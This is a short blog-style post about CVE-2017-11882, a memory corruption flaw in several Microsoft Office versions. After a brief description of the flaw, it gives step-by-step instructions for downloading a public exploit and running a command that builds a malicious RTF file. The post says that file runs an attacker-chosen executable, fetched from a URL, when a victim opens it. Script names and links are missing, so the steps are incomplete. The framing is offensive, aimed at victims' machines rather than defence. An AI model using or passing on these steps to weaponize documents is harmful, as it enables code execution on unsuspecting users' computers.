CVE-2017-11882 POC, Exploit Released – Skeleton in the Closet

A 17 year old Vulnerability in Microsoft Word was disclosed recently tracked by CVE-2017-11882 which affected the major versions of Microsoft Office – Microsoft Office 2007 SP 3, Microsoft Office 2010 SP 2, Microsoft Office 2013 SP 1, and Microsoft Office 2016. This vulnerability allows attackers to run remote codes with the privileges of the current user due to the flaw in handling objects in the memory which is otherwise known as “Microsoft Office Memory Corruption Vulnerability”. You can download the white paper by clicking the link below.

Download White Paper

Exploit for this vulnerability has been released by ‘Embedi’ and is available for download in their github page.



Step 1

Start a Terminal and perform an update and an upgrade by executing the command

sudo apt update

sudo apt upgrade

Step 2

The code is available for download, click the below link to download


Step 3

Go inside the directory and you will find a file named “”. This is the file that we will be using to create the exploit rtf file. Now you can execute the command

python -h

for help.

To create the payload execute the command

python -u <URL> -e <executable_file> -o <output_name>

When this file is opened in the victims machine, the executable file will start to run.




Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *